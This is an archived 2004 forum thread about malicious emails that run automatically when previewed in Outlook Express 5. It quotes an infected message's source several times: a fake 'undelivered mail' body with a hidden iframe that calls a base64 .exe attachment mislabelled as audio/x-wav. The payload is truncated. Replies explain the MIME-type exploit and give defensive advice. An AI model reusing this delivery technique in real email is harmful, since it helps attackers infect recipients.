VIRUS ATTACHMENTS LAUNCHING AUTOMATICALLY

Discussion in 'Computer Security' started by sam1967@hetnet.nl, Jan 29, 2004.

  1. Guest

    Can anyone explain how virus attachments are able to launch
    automatically in Outlook Express v 5 ?
    i dont have to double click the message - simply previewing it is
    enough for the attachment to launch.
    my virus software picks it up OK.
    I am using OE 5 on a test machine.

    the message source looks like this

    --yGcloeJZMdWojiD
    Content-Type: text/html;
    Content-Transfer-Encoding: quoted-printable

    <HTML><HEAD></HEAD><BODY>
    <iframe src=3D"cid:cispqf" height=3D0 width=3D0></iframe>
    Hi. This is the post-service program.<BR><BR>
    I'm sorry to have to inform you that the message returned
    <BR>below could not be delivered to one or more destinations.
    <BR><BR><BR><BR>
    Undelivered to
    </BODY></HTML>

    --yGcloeJZMdWojiD
    Content-Type: audio/x-wav; name="oqhmkXWJJE.exe"
    Content-Transfer-Encoding: base64
    Content-Id: <cispqf>

    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
    ZGUuDQ0KJAAAAAAAAAC3Egfb83NpiPNzaYjzc2mIGmxkiPJzaYhSaWNo83NpiAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAFBFAABMAQMAdV1OPgAAAAAAAAAA4AAPAQsBBgAAgAAAAPABAAAAAACEEQAA
    ABAAAACQAAAAAEAAABAAAAAQAAAEAAAACQAfAAQAAAAAAAAAAIACAAAQAABa7QIAAgAAAAAAEAAA
    .......................................etc etc etc ...........
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

    --yGcloeJZMdWojiD--
     
    , Jan 29, 2004
    #1
    1. Advertising

  2. Glenn Jarvis Guest

    wrote:
    > Can anyone explain how virus attachments are able to launch
    > automatically in Outlook Express v 5 ?
    > i dont have to double click the message - simply previewing it is
    > enough for the attachment to launch.
    > my virus software picks it up OK.
    > I am using OE 5 on a test machine.
    >
    > the message source looks like this
    >

    Unfortunately, about 6 months ago , I was using OE5 on dialup and
    encountered one of these. At the time AVG was running and set to
    interface with OE. It didn't pick up on it and I had the preview pane
    off. The sucker within 10 seconds infected my entire network of 4 boxes,
    with o/s on each ranging from dos6.22 to Win95. When I rebooted the main
    unit and tried to AVG, it kept crashing. I was eventually able to get
    rid of it, but the message itself in OE... was gone. No where to be
    found. Took me the entire day to disinfect my system. When I asked about
    it, I was told that this was what OE does, depending on the message.
    I've never used it since. In fact, I very rarely use IE anymore. Oh, and
    I don't use AVG anymore.
    I will say this, I'm evaluating F-Prot right now with the RealTime
    Protector with Mozilla and with all the crap floating out there right
    now, it picked up immediately virus infected messages. I didn't even
    view them, they were just sent directly to the "Trash" and F-Prot
    notified me right away. Other folks here may have other opinions or
    views, possibly even a solution to preventing OE from doing what it did
    (there are some pretty knowledgable folks here), but my choice was to
    avoid using the IE/OE combination.Oh, and the junk filters in Mozilla
    actually work properly without slowing down the program.

    HTH
    Glenn
     
    Glenn Jarvis, Jan 29, 2004
    #2
    1. Advertising

  3. Pepperoni Guest

    "Glenn Jarvis" <> wrote in message
    news:3Z8Sb.36629$...
    > wrote:
    > Other folks here may have other opinions or
    > views, possibly even a solution to preventing OE from doing what it did
    > (there are some pretty knowledgable folks here), but my choice was to
    > avoid using the IE/OE combination.Oh, and the junk filters in Mozilla
    > actually work properly without slowing down the program.
    >
    > HTH
    > Glenn
    >

    The first thing to do is dump the address book. Set your preferences to
    *NOT* add everyone you reply too, otherwise everyone whose posts you answer
    will be filed waiting for a mass mailer to slip through. Where is the first
    place it will look for addys? yep

    Next you need to set your OE security to high. This will prevent
    downloading attachments. (and midis, and jpegs and text.exe's) This makes
    it a bit harder to download, but prevents accidents.

    I don't even use OE for email any more. I use throw away hotmail accounts.
    The last one I got was infected in hours with SWEN, and they are still
    coming through. Of 4 accounts, two get the SWEN loads, and 2 don't. I see
    no logic, except that someone I know has my addy on their machine, and every
    time he boots up, I get a load. Another account that I used for over a year
    in the newsgroups never got hit---- go figure.
     
    Pepperoni, Jan 29, 2004
    #3
  4. Glenn Guest

    On Thu, 29 Jan 2004 09:42:56 -0500, Glenn Jarvis
    <> wrote:

    > wrote:
    >> Can anyone explain how virus attachments are able to launch
    >> automatically in Outlook Express v 5 ?
    >> i dont have to double click the message - simply previewing it is
    >> enough for the attachment to launch.
    >> my virus software picks it up OK.
    >> I am using OE 5 on a test machine.


    You could use MailWasher to preview your mail BEFORE downloading it.
    Shows From, Subject, File Size, Attachment/yes or no. Message text can
    be read. Works for me!

    Glenn
     
    Glenn, Jan 29, 2004
    #4
  5. charlie R Guest

    Hi, I don't remember about v 5, but OE6Sp1 has the option to turn
    off the preview pane, which automatically opens. I haven't used it
    for months, because of the recent proliferation of virus emails in
    Newsgroups. My AV will catch them, but it's startling, and
    unnecessary to use the Preview Pane. Don't miss it at all.
    charlie R


    <> wrote in message
    news:...
    > Can anyone explain how virus attachments are able to launch
    > automatically in Outlook Express v 5 ?
    > i dont have to double click the message - simply previewing it is
    > enough for the attachment to launch.
    > my virus software picks it up OK.
    > I am using OE 5 on a test machine.
    >
    > the message source looks like this
    >
    > --yGcloeJZMdWojiD
    > Content-Type: text/html;
    > Content-Transfer-Encoding: quoted-printable
    >
    > <HTML><HEAD></HEAD><BODY>
    > <iframe src=3D"cid:cispqf" height=3D0 width=3D0></iframe>
    > Hi. This is the post-service program.<BR><BR>
    > I'm sorry to have to inform you that the message returned
    > <BR>below could not be delivered to one or more destinations.
    > <BR><BR><BR><BR>
    > Undelivered to
    > </BODY></HTML>
    >
    > --yGcloeJZMdWojiD
    > Content-Type: audio/x-wav; name="oqhmkXWJJE.exe"
    > Content-Transfer-Encoding: base64
    > Content-Id: <cispqf>
    >
    >

    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAA
    >

    AAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE
    9TIG1v
    >

    ZGUuDQ0KJAAAAAAAAAC3Egfb83NpiPNzaYjzc2mIGmxkiPJzaYhSaWNo83NpiAAAAAAAAA
    AAAAAA
    >

    AAAAAAAAAAAAAAAAAFBFAABMAQMAdV1OPgAAAAAAAAAA4AAPAQsBBgAAgAAAAPABAAAAAA
    CEEQAA
    >

    ABAAAACQAAAAAEAAABAAAAAQAAAEAAAACQAfAAQAAAAAAAAAAIACAAAQAABa7QIAAgAAAA
    AAEAAA
    > ......................................etc etc etc ...........
    >

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAA
    >

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAA
    >

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAA
    > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    >
    > --yGcloeJZMdWojiD--
    >
    >
    >
     
    charlie R, Jan 29, 2004
    #5
  6. Heather Guest

    All of the answers gave varying views of OE and so on.......but if you
    insist on using an old, vulnerable version of OE, then that is what is
    going to happen. RUN to Windows Update and get the patch for the
    vulnerability or download OE/IE 6.

    Outlook Express can be quite safe IF you make sure it is updated and/or
    patched. And use some common sense Message Rules. OE5 has to be at
    least 3 years old......any particular reason you don't have the latest,
    safer version?

    HTH.....Heather

    <> wrote in message
    news:...
    > Can anyone explain how virus attachments are able to launch
    > automatically in Outlook Express v 5 ?
    > i dont have to double click the message - simply previewing it is
    > enough for the attachment to launch.
    > my virus software picks it up OK.
    > I am using OE 5 on a test machine.
    >
    > the message source looks like this
    >
    > --yGcloeJZMdWojiD
    > Content-Type: text/html;
    > Content-Transfer-Encoding: quoted-printable
    >
    > <HTML><HEAD></HEAD><BODY>
    > <iframe src=3D"cid:cispqf" height=3D0 width=3D0></iframe>
    > Hi. This is the post-service program.<BR><BR>
    > I'm sorry to have to inform you that the message returned
    > <BR>below could not be delivered to one or more destinations.
    > <BR><BR><BR><BR>
    > Undelivered to
    > </BODY></HTML>
    >
    > --yGcloeJZMdWojiD
    > Content-Type: audio/x-wav; name="oqhmkXWJJE.exe"
    > Content-Transfer-Encoding: base64
    > Content-Id: <cispqf>
    >
    >

    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAA
    >

    AAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9T
    IG1v
    >

    ZGUuDQ0KJAAAAAAAAAC3Egfb83NpiPNzaYjzc2mIGmxkiPJzaYhSaWNo83NpiAAAAAAAAAAA
    AAAA
    >

    AAAAAAAAAAAAAAAAAFBFAABMAQMAdV1OPgAAAAAAAAAA4AAPAQsBBgAAgAAAAPABAAAAAACE
    EQAA
    >

    ABAAAACQAAAAAEAAABAAAAAQAAAEAAAACQAfAAQAAAAAAAAAAIACAAAQAABa7QIAAgAAAAAA
    EAAA
    > ......................................etc etc etc ...........
    >

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAA
    >

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAA
    >

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAA
    > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    >
    > --yGcloeJZMdWojiD--
    >
    >
    >
     
    Heather, Jan 29, 2004
    #6
  7. Alan P Guest

    Reason it did so, because mime type set to wav
    Browser thinks it's a music file, and tries to play it
    Best way is justb turn off HTML formatting

    <> wrote in message
    news:...
    > Can anyone explain how virus attachments are able to launch
    > automatically in Outlook Express v 5 ?
    > i dont have to double click the message - simply previewing it is
    > enough for the attachment to launch.
    > my virus software picks it up OK.
    > I am using OE 5 on a test machine.
    >
    > the message source looks like this
    >
    > --yGcloeJZMdWojiD
    > Content-Type: text/html;
    > Content-Transfer-Encoding: quoted-printable
    >
    > <HTML><HEAD></HEAD><BODY>
    > <iframe src=3D"cid:cispqf" height=3D0 width=3D0></iframe>
    > Hi. This is the post-service program.<BR><BR>
    > I'm sorry to have to inform you that the message returned
    > <BR>below could not be delivered to one or more destinations.
    > <BR><BR><BR><BR>
    > Undelivered to
    > </BODY></HTML>
    >
    > --yGcloeJZMdWojiD
    > Content-Type: audio/x-wav; name="oqhmkXWJJE.exe"
    > Content-Transfer-Encoding: base64
    > Content-Id: <cispqf>
    >
    >

    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >

    AAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
    >

    ZGUuDQ0KJAAAAAAAAAC3Egfb83NpiPNzaYjzc2mIGmxkiPJzaYhSaWNo83NpiAAAAAAAAAAAAAAA
    >

    AAAAAAAAAAAAAAAAAFBFAABMAQMAdV1OPgAAAAAAAAAA4AAPAQsBBgAAgAAAAPABAAAAAACEEQAA
    >

    ABAAAACQAAAAAEAAABAAAAAQAAAEAAAACQAfAAQAAAAAAAAAAIACAAAQAABa7QIAAgAAAAAAEAAA
    > ......................................etc etc etc ...........
    >

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    >
    > --yGcloeJZMdWojiD--
    >
    >
    >
     
    Alan P, Jan 29, 2004
    #7
  8. Mimic Guest

    <> wrote in message
    news:...
    > Can anyone explain how virus attachments are able to launch
    > automatically in Outlook Express v 5 ?
    > i dont have to double click the message - simply previewing it is
    > enough for the attachment to launch.
    > my virus software picks it up OK.
    > I am using OE 5 on a test machine.
    >
    > the message source looks like this
    >
    > --yGcloeJZMdWojiD
    > Content-Type: text/html;
    > Content-Transfer-Encoding: quoted-printable
    >
    > <HTML><HEAD></HEAD><BODY>
    > <iframe src=3D"cid:cispqf" height=3D0 width=3D0></iframe>
    > Hi. This is the post-service program.<BR><BR>
    > I'm sorry to have to inform you that the message returned
    > <BR>below could not be delivered to one or more destinations.
    > <BR><BR><BR><BR>
    > Undelivered to
    > </BODY></HTML>
    >
    > --yGcloeJZMdWojiD
    > Content-Type: audio/x-wav; name="oqhmkXWJJE.exe"
    > Content-Transfer-Encoding: base64
    > Content-Id: <cispqf>


    > --yGcloeJZMdWojiD--
    >
    >
    >


    Turn off preview. Set to read in text only. JS/VBS code in the window will
    execute it for you

    --
    Mimic

    ZGF0YWZsZXhAY2FubmFiaXNtYWlsLmNvbQ== ( www.hidemyemail.net )
    "Without knowledge you have fear. With fear you create your own nightmares."
    "There are 10 types of people in the world. Those that understand Binary,
    and those that dont."
    "He who controls Google, controls the world".
     
    Mimic, Jan 29, 2004
    #8
  9. 'When you have a degree-you don't know everything-just a degree'-Dr Miles
    Munroe
    This message is virus free as far I can tell
    Change nomail.afraid.org to hotmail.com so you can reply
    (nomail.afraid.org has been set up specifically for
    use in Usenet. Feel free to use it yourself.)

    Is this your real e-mail?

    <> wrote in message

    If it is you must change it before you get a" infection"


    news:...
    > Can anyone explain how virus attachments are able to launch
    > automatically in Outlook Express v 5 ?


    i believe it is enabled by default

    > i dont have to double click the message - simply previewing it is
    > enough for the attachment to launch.
    > my virus software picks it up OK.
    > I am using OE 5 on a test machine.
    >
    > the message source looks like this
    >

    <snip>
    Be safe-practice safe hex
    max
     
    Max M.Wachtel III, Jan 30, 2004
    #9
  10. <> wrote in message news:...
    > Can anyone explain how virus attachments are able to launch
    > automatically in Outlook Express v 5 ?


    Yes, it has to do with the fact that the filetype that is indicated in
    the MIME "Content-Type" field does not match the actual filetype
    of the content and the fact that the MIME type info from that
    "Content-Type" field is used by the MIME decoding software
    to determine that it is safe to go ahead and use the content. The
    other problem is that the actual filetype is what the OS uses to
    determine how to treat the file (i.e. it executes it rather than sending
    it to the appropriate, in this case audio, application as it would if it
    really were a "wave" file).

    Content-Type: audio/x-wav; name="oqhmkXWJJE.exe"

    ....or something like that.

    You could use a search engine to look for "IFrame exploit"
    (it is a misnomer, but should get some hits anyway). More
    correctly you could search for "Incorrect MIME Type exploit"
    which I believe is the correct name for the exploit. There should
    be some good explanations of how it works if that is what you
    are interested in.
     
    FromTheRafters, Jan 30, 2004
    #10
  11. joe Guest

    First one to get it right.....congrats....

    Cheers,
    'Joe' - (MD version of Northern VA 'Bob')

    FromTheRafters wrote:

    > <> wrote in message news:...
    > > Can anyone explain how virus attachments are able to launch
    > > automatically in Outlook Express v 5 ?

    >
    > Yes, it has to do with the fact that the filetype that is indicated in
    > the MIME "Content-Type" field does not match the actual filetype
    > of the content and the fact that the MIME type info from that
    > "Content-Type" field is used by the MIME decoding software
    > to determine that it is safe to go ahead and use the content. The
    > other problem is that the actual filetype is what the OS uses to
    > determine how to treat the file (i.e. it executes it rather than sending
    > it to the appropriate, in this case audio, application as it would if it
    > really were a "wave" file).
    >
    > Content-Type: audio/x-wav; name="oqhmkXWJJE.exe"
    >
    > ...or something like that.
    >
    > You could use a search engine to look for "IFrame exploit"
    > (it is a misnomer, but should get some hits anyway). More
    > correctly you could search for "Incorrect MIME Type exploit"
    > which I believe is the correct name for the exploit. There should
    > be some good explanations of how it works if that is what you
    > are interested in.
     
    joe, Jan 30, 2004
    #11
  12. Ben Measures Guest

    Glenn Jarvis wrote:
    > wrote:
    >
    >> Can anyone explain how virus attachments are able to launch
    >> automatically in Outlook Express v 5 ?
    >> i dont have to double click the message - simply previewing it is
    >> enough for the attachment to launch.
    >> my virus software picks it up OK.
    >> I am using OE 5 on a test machine.
    >>
    >> the message source looks like this
    >>

    > Unfortunately, about 6 months ago , I was using OE5 on dialup and
    > encountered one of these. At the time AVG was running and set to
    > interface with OE. It didn't pick up on it and I had the preview pane
    > off. The sucker within 10 seconds infected my entire network of 4 boxes,
    > with o/s on each ranging from dos6.22 to Win95.
    > HTH
    > Glenn


    LOL, you're having a laugh! Tut, tut.

    --
    Ben M.

    ----------------
    What are Software Patents for?
    To protect the small enterprise from bigger companies.

    What do Software Patents do?
    In its current form, they protect only companies with
    big legal departments as they:
    a.) Patent everything no matter how general
    b.) Sue everybody. Even if the patent can be argued
    invalid, small companies can ill-afford the
    typical $500k cost of a law-suit (not to mention
    years of harassment).

    Don't let them take away your right to program
    whatever you like. Make a stand on Software Patents
    before its too late.

    Read about the ongoing battle at http://swpat.ffii.org/
    ----------------
     
    Ben Measures, Jan 30, 2004
    #12
  13. Ben Measures Guest

    Heather wrote:
    > Outlook Express can be quite safe IF you make sure it is updated and/or
    > patched.


    Then how comes OE/IE keep needing new patches?

    --
    Ben M.

    ----------------
    What are Software Patents for?
    To protect the small enterprise from bigger companies.

    What do Software Patents do?
    In its current form, they protect only companies with
    big legal departments as they:
    a.) Patent everything no matter how general
    b.) Sue everybody. Even if the patent can be argued
    invalid, small companies can ill-afford the
    typical $500k cost of a law-suit (not to mention
    years of harassment).

    Don't let them take away your right to program
    whatever you like. Make a stand on Software Patents
    before its too late.

    Read about the ongoing battle at http://swpat.ffii.org/
    ----------------
     
    Ben Measures, Jan 30, 2004
    #13
  14. Guest

    On Thu, 29 Jan 2004 21:01:44 +0000 (UTC), "Alan P"
    <alan@(nojunkplease)alancode.net> wrote:

    >Reason it did so, because mime type set to wav
    >Browser thinks it's a music file, and tries to play it
    >Best way is justb turn off HTML formatting
    >

    How do you turn off HTML formatting in OE 5 ?
    I have looked and cant see the setting.
    PS
    I am doing this because many people are still using OE 5 and I have to
    help them.
     
    , Jan 30, 2004
    #14
  15. Roy Coorne Guest

    wrote:


    > How do you turn off HTML formatting in OE 5 ?


    OE > Tools > Options > Read ...

    Roy
     
    Roy Coorne, Jan 30, 2004
    #15
  16. Pebble Guest

    Pardon my ignorance, but are you talking about 'format background sound/colour, is that how a virus is executed without an attachment being opened (midi, wav)? Any attachments that I receive, never open automatically, wave included. Of course, I don't use the preview pane.
    --
    * * Pebble in Boulder * *
    OE 5.00.2615.200

    FromTheRafters <!> wrote in message news:...
    >
    > <> wrote in message news:...
    > > Can anyone explain how virus attachments are able to launch
    > > automatically in Outlook Express v 5 ?

    >
    > Yes, it has to do with the fact that the filetype that is indicated in
    > the MIME "Content-Type" field does not match the actual filetype
    > of the content and the fact that the MIME type info from that
    > "Content-Type" field is used by the MIME decoding software
    > to determine that it is safe to go ahead and use the content. The
    > other problem is that the actual filetype is what the OS uses to
    > determine how to treat the file (i.e. it executes it rather than sending
    > it to the appropriate, in this case audio, application as it would if it
    > really were a "wave" file).
    >
    > Content-Type: audio/x-wav; name="oqhmkXWJJE.exe"
    >
    > ...or something like that.
    >
    > You could use a search engine to look for "IFrame exploit"
    > (it is a misnomer, but should get some hits anyway). More
    > correctly you could search for "Incorrect MIME Type exploit"
    > which I believe is the correct name for the exploit. There should
    > be some good explanations of how it works if that is what you
    > are interested in.
    >
    >
     
    Pebble, Jan 30, 2004
    #16
  17. Mimic Guest

    "Ben Measures" <> wrote in message
    news:EOlSb.1418$...
    > Heather wrote:
    > > Outlook Express can be quite safe IF you make sure it is updated and/or
    > > patched.

    >
    > Then how comes OE/IE keep needing new patches?
    >
    > --
    > Ben M.
    >
    > ----------------


    same reason everything else does

    --
    Mimic

    ZGF0YWZsZXhAY2FubmFiaXNtYWlsLmNvbQ== ( www.hidemyemail.net )
    "Without knowledge you have fear. With fear you create your own nightmares."
    "There are 10 types of people in the world. Those that understand Binary,
    and those that dont."
    "He who controls Google, controls the world".
     
    Mimic, Jan 30, 2004
    #17
  18. <> wrote in message news:...
    > On Thu, 29 Jan 2004 21:01:44 +0000 (UTC), "Alan P"
    > <alan@(nojunkplease)alancode.net> wrote:
    >
    > >Reason it did so, because mime type set to wav
    > >Browser thinks it's a music file, and tries to play it
    > >Best way is justb turn off HTML formatting
    > >

    > How do you turn off HTML formatting in OE 5 ?
    > I have looked and cant see the setting.
    > PS
    > I am doing this because many people are still using OE 5 and I have to
    > help them.


    Help them to upgrade. There is no "setting" for versions previous
    to OE 6.00.2800 for reading in text mode only. I use OE 8.00.2600
    (which doesn't have that option) to read newsgroups, but I have
    other settings set fairly securely.
     
    FromTheRafters, Jan 30, 2004
    #18
  19. "FromTheRafters" <!> wrote in message news:...
    >
    > <> wrote in message news:...
    > > On Thu, 29 Jan 2004 21:01:44 +0000 (UTC), "Alan P"
    > > <alan@(nojunkplease)alancode.net> wrote:
    > >
    > > >Reason it did so, because mime type set to wav
    > > >Browser thinks it's a music file, and tries to play it
    > > >Best way is justb turn off HTML formatting
    > > >

    > > How do you turn off HTML formatting in OE 5 ?
    > > I have looked and cant see the setting.
    > > PS
    > > I am doing this because many people are still using OE 5 and I have to
    > > help them.

    >
    > Help them to upgrade. There is no "setting" for versions previous
    > to OE 6.00.2800 for reading in text mode only. I use OE 8.00.2600
    > (which doesn't have that option) to read newsgroups, but I have
    > other settings set fairly securely.


    OE 8 - wow (sorry, I meant OE 6).
    OE 8 will probably be a "trusted" app.
     
    FromTheRafters, Jan 31, 2004
    #19
  20. "Pebble" <> wrote in message news:ErtSb.35978$...
    > Pardon my ignorance, but are you talking about 'format background sound/colour,


    No.

    > is that how a virus is executed without an attachment being opened (midi, wav)?


    No, not all MIME types were mishandled. audio/x-wav and audio/x-midi
    are two of the ones that were I think (at least those are the ones most
    used by the worms I have seen). When I use background sound, I get the
    audio/wav (not audio/x-wav).

    > Any attachments that I receive, never open automatically, wave included.


    That is good, how did you accomplish this? Text only e-mail?

    > Of course, I don't use the preview pane.


    I do. The preview pane opens the e-mail automatically ~ not the
    attachment. It is no worse than any other method of opening the
    e-mail, the problem is that the user isn't aware that the e-mail is
    being automatically opened. I like the preview pane and will
    continue to use it ~ albeit, carefully.
     
    FromTheRafters, Jan 31, 2004
    #20
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. CG
    Replies:
    1
    Views:
    502
    gaspin
    Jul 10, 2004
  2. Julian Knight
    Replies:
    2
    Views:
    571
    Julian Knight
    Jul 16, 2004
  3. bub.mk
    Replies:
    1
    Views:
    1,971
    Old Gringo
    Sep 29, 2004
  4. Replies:
    2
    Views:
    430
    Peter Potamus the Purple Hippo
    Sep 3, 2007
  5. meteore
    Replies:
    2
    Views:
    986
    Jeff Strickland
    Nov 24, 2011
Loading...

Share This Page